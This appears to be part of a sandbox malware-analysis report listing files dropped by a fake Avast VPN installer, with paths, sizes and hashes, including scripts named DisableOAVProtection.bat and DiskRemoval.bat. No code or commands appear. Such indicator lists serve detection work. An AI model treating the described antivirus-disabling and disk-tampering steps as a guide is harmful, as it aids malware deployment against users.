                                                                                                                                        • C:\Program Files (x86)\avast_secureline_setup.exe
                                                                                                                                          Filesize

                                                                                                                                          1.0MB

                                                                                                                                          MD5

                                                                                                                                          97a2db945a42346cdae06304a03250a8

                                                                                                                                          SHA1

                                                                                                                                          2b879d1dfb3ec3f41175f762b68bf01eae0b8982

                                                                                                                                          SHA256

                                                                                                                                          1f8aeadcafe26d3a9a04c4a30926864e3baacc0c1751f5e4e3f3ed9fa7b4116a

                                                                                                                                          SHA512

                                                                                                                                          3d4ab63f2a36a3dd852b14caf17ea6ceff5a23563d10b19f1279008d643b350a16b6c71b726ae69bcfaba531744f8a07a9c341d8e1ba85183f8535edd0ddec6e

                                                                                                                                        • C:\Program Files (x86)\avast_secureline_setup.exe
                                                                                                                                          Filesize

                                                                                                                                          1.0MB

                                                                                                                                          MD5

                                                                                                                                          97a2db945a42346cdae06304a03250a8

                                                                                                                                          SHA1

                                                                                                                                          2b879d1dfb3ec3f41175f762b68bf01eae0b8982

                                                                                                                                          SHA256

                                                                                                                                          1f8aeadcafe26d3a9a04c4a30926864e3baacc0c1751f5e4e3f3ed9fa7b4116a

                                                                                                                                          SHA512

                                                                                                                                          3d4ab63f2a36a3dd852b14caf17ea6ceff5a23563d10b19f1279008d643b350a16b6c71b726ae69bcfaba531744f8a07a9c341d8e1ba85183f8535edd0ddec6e

                                                                                                                                        • C:\Program Files (x86)\avastvpn.exe
                                                                                                                                          Filesize

                                                                                                                                          8.3MB

                                                                                                                                          MD5

                                                                                                                                          6ffc5787731424bf302fb6bee6f5f3de

                                                                                                                                          SHA1

                                                                                                                                          e893f1a2d7f10c4c7cd63c10dfe756966d0107f3

                                                                                                                                          SHA256

                                                                                                                                          4bdd0934c8c441a80c0f845f596d3fc431b9165db221264f11ed951bdef66052

                                                                                                                                          SHA512

                                                                                                                                          e9caaac45209aa7e43cd72b26787045f1008fdc0bf4e035b15f8dc59cd175c431b4c611301419dfcab421a6a21abec7c8ef0e95f756765f2ef9dcabfa8c47934

                                                                                                                                        • C:\Program Files (x86)\avastvpn.exe
                                                                                                                                          Filesize

                                                                                                                                          8.3MB

                                                                                                                                          MD5

                                                                                                                                          6ffc5787731424bf302fb6bee6f5f3de

                                                                                                                                          SHA1

                                                                                                                                          e893f1a2d7f10c4c7cd63c10dfe756966d0107f3

                                                                                                                                          SHA256

                                                                                                                                          4bdd0934c8c441a80c0f845f596d3fc431b9165db221264f11ed951bdef66052

                                                                                                                                          SHA512

                                                                                                                                          e9caaac45209aa7e43cd72b26787045f1008fdc0bf4e035b15f8dc59cd175c431b4c611301419dfcab421a6a21abec7c8ef0e95f756765f2ef9dcabfa8c47934

                                                                                                                                        • C:\ProgramData\60sKjNzt\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • C:\ProgramData\60sKjNzt\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\60sKjNzt\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\60sKjNzt\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\60sKjNzt\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\60sKjNzt\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\60sKjNzt\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\60sKjNzt\DisableOAVProtection.bat
                                                                                                                                          Filesize

                                                                                                                                          33KB

                                                                                                                                          MD5

                                                                                                                                          c97c64f53865b9da2a642d36b02df043

                                                                                                                                          SHA1

                                                                                                                                          181ca1deb68409feae2e70ebf347b3111218a47a

                                                                                                                                          SHA256

                                                                                                                                          1e37317e8e44fcf8ee132870eb137021e8828be99dcc69d1167f1bce9fb24e17

                                                                                                                                          SHA512

                                                                                                                                          05ef252545d9315a100ba2e109499c0596fd8a0d02679e42d0e3a2f3047518ded7cf342ce9c414b48387ff102d516c3fbc7b4dcbf1bb445e2a23ed9c6092ec2c

                                                                                                                                        • C:\ProgramData\60sKjNzt\DiskRemoval.bat
                                                                                                                                          Filesize

                                                                                                                                          211B

                                                                                                                                          MD5

                                                                                                                                          0f00552cee3a31dc4e8adc2738ca6d76

                                                                                                                                          SHA1

                                                                                                                                          85f0353b58b6749eee6b06101b05db242d44d0c2

                                                                                                                                          SHA256

                                                                                                                                          1094424ae118bb1060b5f4057c6b1d8b2eef2213bab3cf2b0a2cc6a4009552d8

                                                                                                                                          SHA512

                                                                                                                                          137c48422710fc898cfc1dd5f70f8fe2a505de030594c732255de62c73b22305acdd5340ff5a49fa8ddc3af5285f5a970158e53d0b74f9728ec0844e2587d835

                                                                                                                                        • C:\ProgramData\60sKjNzt\MMF.vbs
                                                                                                                                          Filesize

                                                                                                                                          20KB

                                                                                                                                          MD5

                                                                                                                                          fa6dcfa398aff28ba12687272732eb51

                                                                                                                                          SHA1

                                                                                                                                          f207b64cfd0270d6f2222e2fac98ef9c262dd313

                                                                                                                                          SHA256

                                                                                                                                          f2df2c8ac96c7c2e54afe992b302d823dc62d5754b6882b5ffdf19c293fc298d

                                                                                                                                          SHA512

                                                                                                                                          9064b3a25b2c1dcfd2d91ec28fe4e61843739d3fc6a630bf46055b8e6198b546398e06e81c62a7ae47c8316f162145b81d228d3bcbc5a9ee44b458aba6f59dfd

                                                                                                                                        • C:\ProgramData\60sKjNzt\extracted\ANTIAV~1.DAT
                                                                                                                                          Filesize

                                                                                                                                          2.0MB

                                                                                                                                          MD5

                                                                                                                                          936ec62aa4218f94c16630f9f187104d

                                                                                                                                          SHA1

                                                                                                                                          36730bec193c9e7fc6d29111032a33f55af62708

                                                                                                                                          SHA256

                                                                                                                                          243a357b619a10d2a00bcff56014579b33fd739327df1c7b6387ecdb9587c58a

                                                                                                                                          SHA512

                                                                                                                                          5c3aef3821e1b8827568962a56df5f75c4a4aabbc8510c859e6b2e2e1021e434b76ee0634b973f6401e22530f94bad1142b46aee7ddf63e89a5c6a465e389016

                                                                                                                                        • C:\ProgramData\60sKjNzt\extracted\file_1.zip
                                                                                                                                          Filesize

                                                                                                                                          4.2MB

                                                                                                                                          MD5

                                                                                                                                          74ba1c57a39b1afec10222d82472838d

                                                                                                                                          SHA1

                                                                                                                                          d7fccb7fe141d34a44080d7b1581ce2652384495

                                                                                                                                          SHA256

                                                                                                                                          63de19054eac176fe752a71415b3497478b40323e51a2a0b0ca33cd625494dd7

                                                                                                                                          SHA512

                                                                                                                                          def9e6ba10992a230e1d17cd69542985041e0d28b55c2f85b823ce7dba42c542389d0a9fc0879afb2239520c4306586e0fc5cdd28bf7bea7ccbcc86c2e12f45d

                                                                                                                                        • C:\ProgramData\60sKjNzt\extracted\file_2.zip
                                                                                                                                          Filesize

                                                                                                                                          4.2MB

                                                                                                                                          MD5

                                                                                                                                          712f24e9ed6735b8874658ab4990652c

                                                                                                                                          SHA1

                                                                                                                                          7f96750acb999a6b063330279f7d3441349fdb47

                                                                                                                                          SHA256

                                                                                                                                          a5c91eb64197c4f1bcb0c9b1a548caa971148c631518fd677812205671233868

                                                                                                                                          SHA512

                                                                                                                                          f93b41a0d2fe35b6a95779719effa06c3f97d7beccba0219cafdf956558596c83e97d132d4ba3ba659f080a7846dc4bf73f18cff60b36de01345c2767a6d25ef

                                                                                                                                        • C:\ProgramData\60sKjNzt\extracted\file_3.zip
                                                                                                                                          Filesize

                                                                                                                                          4.2MB

                                                                                                                                          MD5

                                                                                                                                          56c73fa96cf3d92f9fefa6181dec9820

                                                                                                                                          SHA1

                                                                                                                                          abfa28891fdb85a0c2c1954754f86d99de1f2b5e

                                                                                                                                          SHA256

                                                                                                                                          31c2af620286824580f365f417308bdb6b2bca50e51506cf1ee327372d5ed2a3

                                                                                                                                          SHA512

                                                                                                                                          d81ebd7c4d1ea1301d4579e9d8944dc3e8c3648039bb1dbc3c784f9beac785705bf97e7cf190776425e39516fc9e2d4b923460b4a1249a77dc0e34713d0ca5ab

                                                                                                                                        • C:\ProgramData\60sKjNzt\extracted\file_4.zip
                                                                                                                                          Filesize

                                                                                                                                          4.2MB

                                                                                                                                          MD5

                                                                                                                                          06e4b159808a5caf41c07c1d695c109a

                                                                                                                                          SHA1

                                                                                                                                          377e2da216fef93e06e9c865fb5b36295baafdca

                                                                                                                                          SHA256

                                                                                                                                          f4f32599547c18a2fed90d608a69619c97c62567f80e3f1e92eb0ef8ec55947b

                                                                                                                                          SHA512

                                                                                                                                          4dc4c33e16137bbd02d5c906d9ff7975649ea1445a55452abe559af94cab482cfca609d18f6ca53ee5cfffe1365b0d7bb78f6f33c750272aaf4ee150389e470d

                                                                                                                                        • C:\ProgramData\60sKjNzt\extracted\file_5.zip
                                                                                                                                          Filesize

                                                                                                                                          5.7MB

                                                                                                                                          MD5

                                                                                                                                          ccca4886560f9ca450d81838cf7f5cfc

                                                                                                                                          SHA1

                                                                                                                                          f865cc0143cf6cc4de9cb67464b9fb44ddbd1ffe

                                                                                                                                          SHA256

                                                                                                                                          e12d1db029f89577a03ae43f760d2876d80fe6607f87916605aad9e9a6affd2e

                                                                                                                                          SHA512

                                                                                                                                          3b2f613e94c68f79cc4ec23661875a443cff7304b34768f65c514a08f9d854001b05b0ff2cda772c27110916d3392b6f2072187572904f52b1878318866990a2

                                                                                                                                        • C:\ProgramData\60sKjNzt\extracted\wxmhost.exe
                                                                                                                                          Filesize

                                                                                                                                          6.1MB

                                                                                                                                          MD5

                                                                                                                                          ff326b90fd2d61260ec4fce412188de9

                                                                                                                                          SHA1

                                                                                                                                          3d638dbe6df6711cbb9486efc1108cea67385ac7

                                                                                                                                          SHA256

                                                                                                                                          1a3719c8960c43977abee59e68b9d1fbc1ec1bd24de1cffc6eb09482d5c2e074

                                                                                                                                          SHA512

                                                                                                                                          5d8ad5a425d98c0707316b6dd0d8fd77c2725b9fb3023c87df4460550deff60a3d8ebb9c2cba114c763c9c58bb189ebb7e36e52db2f8a1a4baf2c60ed6182999

                                                                                                                                        • C:\ProgramData\60sKjNzt\file.bin
                                                                                                                                          Filesize

                                                                                                                                          5.7MB

                                                                                                                                          MD5

                                                                                                                                          41fb315128e3e45474e95129b06a62e5

                                                                                                                                          SHA1

                                                                                                                                          9beb88b63503a78d3d3f7fefb8608c57e2691e3f

                                                                                                                                          SHA256

                                                                                                                                          c948db484769356822072222644beb28844f96a89ab61c777cba7240183d24f7

                                                                                                                                          SHA512

                                                                                                                                          add5c51ad75a3aefb56ada4aaaed6acf771b1cb1e8779fed7e82509b9cfb12b3f1004d21168e185539444650e3f6a38fc285fc0075e91bff262316ac66a71ff0

                                                                                                                                        • C:\ProgramData\60sKjNzt\main.bat
                                                                                                                                          Filesize

                                                                                                                                          404B

                                                                                                                                          MD5

                                                                                                                                          5b1fb930713594961211bc1ef54a6ba8

                                                                                                                                          SHA1

                                                                                                                                          61a1d742dfa2ce86aa6319777d037f9a9a4622e8

                                                                                                                                          SHA256

                                                                                                                                          48c693118f0f8ca3dd62c8054c7d296c13b4521dae3a463a0de4e28270f02774

                                                                                                                                          SHA512

                                                                                                                                          9495c848dd4726590c02adf6cd4575faa855d72a8c040d3255ebf6f68406ef49c1a24ac2af0708ecbead2ad66b672862bc79979e888cfadce8db6224d6373044

                                                                                                                                        • C:\ProgramData\60sKjNzt\wxmhost.exe
                                                                                                                                          Filesize

                                                                                                                                          6.1MB

                                                                                                                                          MD5

                                                                                                                                          ff326b90fd2d61260ec4fce412188de9

                                                                                                                                          SHA1

                                                                                                                                          3d638dbe6df6711cbb9486efc1108cea67385ac7

                                                                                                                                          SHA256

                                                                                                                                          1a3719c8960c43977abee59e68b9d1fbc1ec1bd24de1cffc6eb09482d5c2e074

                                                                                                                                          SHA512

                                                                                                                                          5d8ad5a425d98c0707316b6dd0d8fd77c2725b9fb3023c87df4460550deff60a3d8ebb9c2cba114c763c9c58bb189ebb7e36e52db2f8a1a4baf2c60ed6182999

                                                                                                                                        • C:\ProgramData\xOUvu\7z.dll
                                                                                                                                          Filesize

                                                                                                                                          1.6MB

                                                                                                                                          MD5

                                                                                                                                          72491c7b87a7c2dd350b727444f13bb4

                                                                                                                                          SHA1

                                                                                                                                          1e9338d56db7ded386878eab7bb44b8934ab1bc7

                                                                                                                                          SHA256

                                                                                                                                          34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                                                                                                                                          SHA512

                                                                                                                                          583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                                                                                                                                        • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\xOUvu\7z.exe
                                                                                                                                          Filesize

                                                                                                                                          458KB

                                                                                                                                          MD5

                                                                                                                                          619f7135621b50fd1900ff24aade1524

                                                                                                                                          SHA1

                                                                                                                                          6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                                                                                                                                          SHA256

                                                                                                                                          344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                                                                                                                                          SHA512

                                                                                                                                          2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                                                                                                                                        • C:\ProgramData\xOUvu\DisableOAVProtection.bat
                                                                                                                                          Filesize

                                                                                                                                          136KB

                                                                                                                                          MD5

                                                                                                                                          ed77c2b2866fc09850a317f2620f4f9c

                                                                                                                                          SHA1

                                                                                                                                          ed1d7485a1111bd553ffe81927260652718a1c39

                                                                                                                                          SHA256

                                                                                                                                          763c290bbc1bfaedb53c909a63453d88204680ff6b5e50d7c68b14accc706c17

                                                                                                                                          SHA512

                                                                                                                                          4ed12352142c38750656780acf836805f3190a21aeab117e1c62fa06cf54920754c598daba3e02a981b6440261ce211e5717f6f1183cfebf6c8805d8201fa0e2

                                                                                                                                        • C:\ProgramData\xOUvu\DiskRemoval.bat
                                                                                                                                          Filesize

                                                                                                                                          211B

                                                                                                                                          MD5

                                                                                                                                          0f00552cee3a31dc4e8adc2738ca6d76

                                                                                                                                          SHA1

                                                                                                                                          85f0353b58b6749eee6b06101b05db242d44d0c2

                                                                                                                                          SHA256

                                                                                                                                          1094424ae118bb1060b5f4057c6b1d8b2eef2213bab3cf2b0a2cc6a4009552d8

                                                                                                                                          SHA512

                                                                                                                                          137c48422710fc898cfc1dd5f70f8fe2a505de030594c732255de62c73b22305acdd5340ff5a49fa8ddc3af5285f5a970158e53d0b74f9728ec0844e2587d835

                                                                                                                                        • C:\ProgramData\xOUvu\MMF.vbs
                                                                                                                                          Filesize

                                                                                                                                          67KB

                                                                                                                                          MD5

                                                                                                                                          62c210400fef1cb41efa4c8b2c963964

                                                                                                                                          SHA1

                                                                                                                                          fa471dcf721b5f61a8794a75e3a9226e79b3ec80

                                                                                                                                          SHA256

                                                                                                                                          ac5fa9691beee8045bc5b4e4ede4816339cbef901f4d7c83f70e64e8c5f10d10

                                                                                                                                          SHA512

                                                                                                                                          64d99cd6a739bee853820172b24408173c4799f6c61037ad212cb56434fba7f014f58b2f88bcd209fdfd5976a183cd3d91588fc8f274fced444e726cf8e25d5a

                                                                                                                                        • C:\ProgramData\xOUvu\extracted\file_10.zip
                                                                                                                                          Filesize

                                                                                                                                          3.6MB

                                                                                                                                          MD5

                                                                                                                                          653254d9174e6a9e34515f920faaa4fa

                                                                                                                                          SHA1

                                                                                                                                          1655d6e910b8ea9547487548e9862e905d37687f

                                                                                                                                          SHA256

                                                                                                                                          162d7e27f22836781803301c9539a66381ceab682d18275422742009a057a6e6

                                                                                                                                          SHA512

                                                                                                                                          418f842d008c3c09b6df65f6bf90e777cf11286a1fda397bee1f24cc8f4140c36c95b279f61d253f7f0e967bd4dac38f096b842312eefdb3750cfef26610986c

                                                                                                                                        • C:\ProgramData\xOUvu\extracted\file_11.zip
                                                                                                                                          Filesize

                                                                                                                                          5.0MB

                                                                                                                                          MD5

                                                                                                                                          6a7e461229c7336211c2a15b8cb08a98

                                                                                                                                          SHA1

                                                                                                                                          93c2a8e2397af9a1c5c2815220124b5826593d69

                                                                                                                                          SHA256

                                                                                                                                          8f554be2e689068002d244c93c6712fa522e463ebad2882eef7ee7062abc6568

                                                                                                                                          SHA512

                                                                                                                                          52be50bae32d8be39d2fe54b88093f17ade38d8e256c50a3940cf2c565b4e855960b3a56f36459382adc93e1614367a23d3dea5f027fcbbe5871c414a35cac9a

                                                                                                                                        • C:\ProgramData\xOUvu\extracted\file_7.zip
                                                                                                                                          Filesize

                                                                                                                                          3.6MB

                                                                                                                                          MD5

                                                                                                                                          6ad0048b09024eab2cf26bf1f39dae12

                                                                                                                                          SHA1

                                                                                                                                          06d4accbe31e21efc9df58db8b72111a759e86ee

                                                                                                                                          SHA256

                                                                                                                                          daf2607026f846a90de537f8a820c670daa11212f4539a75e39337aa552566a8

                                                                                                                                          SHA512

                                                                                                                                          0e3afa7b493b2b064c77f76d40c396ab6eb838accc95df062f093d9c8aa9ef8ed2f06f2da65a45559277a8eec0fff79a9b8bf93588ecbf7a4cf712d3756c9309

                                                                                                                                        • C:\ProgramData\xOUvu\extracted\file_8.zip
                                                                                                                                          Filesize

                                                                                                                                          3.6MB

                                                                                                                                          MD5

                                                                                                                                          334065f5df672c3c39e55d8e78048a8b

                                                                                                                                          SHA1

                                                                                                                                          83e95d386539476bd7561e1dc594d8c85e826a4b

                                                                                                                                          SHA256

                                                                                                                                          6b70a46e6ce13745fb7b3e96986de7080ec311f8e4b39b02087fae5247df4f5f

                                                                                                                                          SHA512

                                                                                                                                          6855b06e9dc3999b0a7c775aac839fd7745974a2f6e579dff583e87cde98ddd085efb981cc6ac5709f9965995e28844061bf84aede6ff801d93c9ed50bff39d0

                                                                                                                                        • C:\ProgramData\xOUvu\extracted\file_9.zip
                                                                                                                                          Filesize

                                                                                                                                          3.6MB

                                                                                                                                          MD5

                                                                                                                                          2b287fed259ccec9b10a6d9048784794

                                                                                                                                          SHA1

                                                                                                                                          6f4935e26ed3ff4b6b138be4d040457632de6bb8

                                                                                                                                          SHA256

                                                                                                                                          6d40b258ebbf62639d1254ac00d38dbf7df044c1ae8e7ce0a90f2dfcbdb6d102

                                                                                                                                          SHA512

                                                                                                                                          166782f9ee9d46053b66a8d648f91cef3bfb3c370c5d13244beefeb6485521088264425309a68ae557b718cfe771f6ac592df67f50a4dcdb220f5c68546b8d73

                                                                                                                                        • C:\ProgramData\xOUvu\file.bin
                                                                                                                                          Filesize

                                                                                                                                          5.0MB

                                                                                                                                          MD5

                                                                                                                                          897c2da4873706af1dd7e95204b8f82c

                                                                                                                                          SHA1

                                                                                                                                          36ef68962c416f3f627d04fdd6a784c4e9b4df37

                                                                                                                                          SHA256

                                                                                                                                          575e2af2e82f7a31e6a2dd0968acbb30d190da22e7935fe718e725cc95843123

                                                                                                                                          SHA512

                                                                                                                                          ae74bb521ddfe33d12c58448daf8191fa05828bf72ae85b226ed99f6ca5c6418d8f87d10532b8bbee8686a3967eef53b1b8565b5278018f40ab273b91dc621ec

                                                                                                                                        • C:\ProgramData\xOUvu\main.bat
                                                                                                                                          Filesize

                                                                                                                                          427B

                                                                                                                                          MD5

                                                                                                                                          87d5210ddd66fe8843cd702ee78b1933

                                                                                                                                          SHA1

                                                                                                                                          f6faf81c8cae28f42ee7e120cf80cba42640e13e

                                                                                                                                          SHA256

                                                                                                                                          b41cfe7095479b54da9913d28fff26a0f5ec916aba826ccd8effb616d9d58a58

                                                                                                                                          SHA512

                                                                                                                                          5c2169c8487f60bfa10dc17d9fd93e2105ea1e7f0d1a22fd8207bd9dd814af6af934206cfe24f6f4ab77324468a9e63796588f52fd78246279c42347bd82f766

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-PV9M9.tmp\avastvpn.tmp
                                                                                                                                          Filesize

                                                                                                                                          2.5MB

                                                                                                                                          MD5

                                                                                                                                          78de2cc886a53e4445ad82a3c80c3e9d

                                                                                                                                          SHA1

                                                                                                                                          57222f63b9b76d1412a81093e8bf1884482c887c

                                                                                                                                          SHA256

                                                                                                                                          92ecc5eca7d2f1e0ce3edeffdafa4d32ab4179de9ce214ae6e83500b4ddb46a7

                                                                                                                                          SHA512

                                                                                                                                          1a3a5d7f47fb477a1d1360a3822785892bd58312569074c51f26221b3b51c931336f2b3f5fc5ec87035405ae9f0ff2f344233d85763f18ac269ddc4ab226d8e5

                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-S6O90.tmp\772b283257ac2eb1b68a87e57a92a7fac88bc50653a86a43e0857b7fdb7c7ea4.tmp
                                                                                                                                          Filesize

                                                                                                                                          2.5MB

                                                                                                                                          MD5

                                                                                                                                          78de2cc886a53e4445ad82a3c80c3e9d

                                                                                                                                          SHA1

                                                                                                                                          57222f63b9b76d1412a81093e8bf1884482c887c

                                                                                                                                          SHA256

                                                                                                                                          92ecc5eca7d2f1e0ce3edeffdafa4d32ab4179de9ce214ae6e83500b4ddb46a7

                                                                                                                                          SHA512

                                                                                                                                          1a3a5d7f47fb477a1d1360a3822785892bd58312569074c51f26221b3b51c931336f2b3f5fc5ec87035405ae9f0ff2f344233d85763f18ac269ddc4ab226d8e5

                                                                                                                                        • \Program Files (x86)\avast_secureline_setup.exe
                                                                                                                                          Filesize

                                                                                                                                          1.0MB

                                                                                                                                          MD5

                                                                                                                                          97a2db945a42346cdae06304a03250a8

                                                                                                                                          SHA1

                                                                                                                                          2b879d1dfb3ec3f41175f762b68bf01eae0b8982

                                                                                                                                          SHA256

                                                                                                                                          1f8aeadcafe26d3a9a04c4a30926864e3baacc0c1751f5e4e3f3ed9fa7b4116a

                                                                                                                                          SHA512

                                                                                                                                          3d4ab63f2a36a3dd852b14caf17ea6ceff5a23563d10b19f1279008d643b350a16b6c71b726ae69bcfaba531744f8a07a9c341d8e1ba85183f8535edd0ddec6e

                                                                                                                                        • \Program Files (x86)\avastvpn.exe
                                                                                                                                          Filesize

                                                                                                                                          8.3MB

                                                                                                                                          MD5

                                                                                                                                          6ffc5787731424bf302fb6bee6f5f3de

                                                                                                                                          SHA1

                                                                                                                                          e893f1a2d7f10c4c7cd63c10dfe756966d0107f3

                                                                                                                                          SHA256

                                                                                                                                          4bdd0934c8c441a80c0f845f596d3fc431b9165db221264f11ed951bdef66052

                                                                                                                                          SHA512

                                                                                                                                          e9caaac45209aa7e43cd72b26787045f1008fdc0bf4e035b15f8dc59cd175c431b4c611301419dfcab421a6a21abec7c8ef0e95f756765f2ef9dcabfa8c47934

                                                                                                                                        • \ProgramData\60sKjNzt\7z.dll
                                                                                                                                          Filesize

